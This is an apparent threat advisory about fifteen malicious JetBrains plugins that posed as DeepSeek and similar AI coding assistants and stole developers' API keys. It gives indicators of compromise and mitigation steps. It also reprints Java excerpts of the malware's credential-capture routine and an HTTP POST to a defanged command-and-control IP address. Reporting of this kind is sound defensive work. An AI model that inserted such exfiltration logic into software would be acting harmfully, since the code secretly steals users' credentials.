Supply Chain Attack Compromises JetBrains Marketplace, Exposing 70,000 Developers to Credential Theft
A sophisticated supply chain campaign has recently been uncovered, targeting the developer ecosystem by compromising the trust within the JetBrains Marketplace. Investigations reveal that over 70,000 developers have been exposed to a silent credential-theft operation designed to siphon high-value API keys from integrated development environments (IDEs).
The attack vector utilizes at least 15 distinct malicious plugins that masquerade as legitimate, high-utility AI coding assistants. By leveraging the hype surrounding Large Language Models (LLMs) like DeepSeek, these plugins offer genuine—albeit limited—functionality, such as automated code reviews, chat interfaces, and commit message generation. This “dual-use” approach allows the malware to bypass superficial scrutiny while the underlying logic performs unauthorized data exfiltration.
Anatomy of the Attack: Stealthy Exfiltration Logic
The campaign has demonstrated significant longevity and adaptability. Operating under seven different vendor personas, these plugins have been active since late 2025, with new iterations appearing as recently as mid-2026. Despite the manual review processes implemented by JetBrains, the attackers successfully embedded exfiltration routines within standard configuration handlers, making them nearly invisible to standard static analysis.
According to research by Aikido Security, the primary objective is the theft of API credentials for providers such as OpenAI, DeepSeek, and SiliconFlow. These keys are high-value assets that can be used to hijack computational resources or sold via underground marketplaces.
Technical analysis indicates that the exfiltration is triggered via a standard “save” event. When a user inputs their API key into the plugin’s settings, the following logic executes:
public static void save(String key) {
// Validates key format (e.g., OpenAI's sk- prefix) and length before exfiltration
if (key != null && key.startsWith("sk-") && ks.add(key) && StringUtils.length(key) == 51) {
SoftwareDto dto = new SoftwareDto();
dto.setApiKey(key);
BaseUtil.request("key", dto);
}
}The stolen payload is then transmitted via unencrypted HTTP to a hardcoded Command-and-Control (C2) server. The lack of TLS encryption suggests a lower level of operational security (OPSEC) from the attackers, yet the use of a static authentication token ensures the data reaches the correct endpoint:
URL url = new URI("http://39.107.60[.]51/api/software/" + name).toURL();
connection.setRequestMethod("POST");
connection.setRequestProperty("X-Api-Key", "F48D2AA7CF341F782C1D");In a particularly cynical twist, some plugins implement a “paid tier” service. Users who pay for premium features are provided with API keys sourced directly from the attacker’s server—essentially providing users with stolen credentials that the attackers have “recycled” from previous victims.
The Expanding Threat Landscape
This incident is not an isolated event but part of a growing trend of targeting the “developer workstation.” Because IDEs act as centralized hubs for source code, cloud access tokens, and sensitive environment variables, they are prime targets for supply chain compromises. We are seeing a parallel evolution in other ecosystems, such as the “GlassWorm” campaign targeting VS Code users.
Indicators of Compromise (IoCs)
Network Indicators
| Type | Indicator | Description |
|---|---|---|
| IP Address | 39.107.60[.]51 | Primary C2 / Exfiltration Endpoint |
Malicious JetBrains Plugins
| Plugin Name | Plugin ID | Approx. Installs | First Observed |
|---|---|---|---|
| DeepSeek Junit Test | org.sm.yms.toolkit | 1,121 | 2025-10-31 |
| DeepSeek Git Commit | com.json.simple.kit | 1,894 | 2025-11-01 |
| DeepSeek FindBugs | org.bug.find.tools | 1,485 | 2025-11-09 |
| DeepSeek AI Chat | org.translate.ai.simple | 1,317 | 2025-11-23 |
| DeepSeek Dev AI | com.yy.test.ai.simple | 740 | 2025-11-30 |
| DeepSeek AI Coding | com.dev.ai.toolkit | 450 | 2025-12-06 |
| AI FindBugs | com.json.view.simple | 623 | 2025-12-14 |
| AI Git Commitor | com.my.git.ai.kit | 301 | 2026-01-10 |
| AI Coder Review | org.check.ai.ds | 735 | 2026-01-11 |
| DeepSeek Coder AI | com.review.tool.code | 3,498 | 2026-01-15 |
| AI Coder Assistant | org.code.assist.dev.tool | 319 | 2026-02-01 |
| DeepSeek Code Review | com.coder.ai.dpt | 278 | 2026-04-18 |
| CodeGPT AI Assistant | com.my.code.tools | 25,571 | 2026-06-09 |
| DeepSeek AI Assist | ord.cp.code.ai.kit | 27,727 | 2026-06-10 |
| Coding Simple Tool | com.dp.git.ai.tool | 3,931 | N/A |
Malicious Vendor Accounts
| Vendor Display Name | Vendor ID / Handle |
|---|---|
| CodePilot | mycode |
| StackSmith | misshewei |
| CodeCrafter | keteme |
| CodeWeaver | simpledev |
| JetCode | skyblue |
| DailyCode | dialycode |
| ZenCoder | 947cb4c8-5db1-4cf0-8182-0aae7c433bb3 |
Note: IP addresses have been defanged (e.g., using [.]). Do not attempt to resolve these in a production environment.
Mitigation and Defense
Security teams and individual developers should take the following immediate actions:
- Audit Plugins: Review all installed JetBrains extensions and remove any that match the list above or appear suspicious.
- Credential Rotation: If you have used any AI-related API keys (OpenAI, Anthropic, DeepSeek, etc.) within an IDE, assume they are compromised and rotate them immediately.
- Implement Least Privilege: Use scoped API keys with limited permissions rather than master account keys whenever possible.
- Enhance Monitoring: Organizations should utilize Software Composition Analysis (SCA) and monitor network egress from developer workstations for unusual HTTP POST requests to unknown endpoints.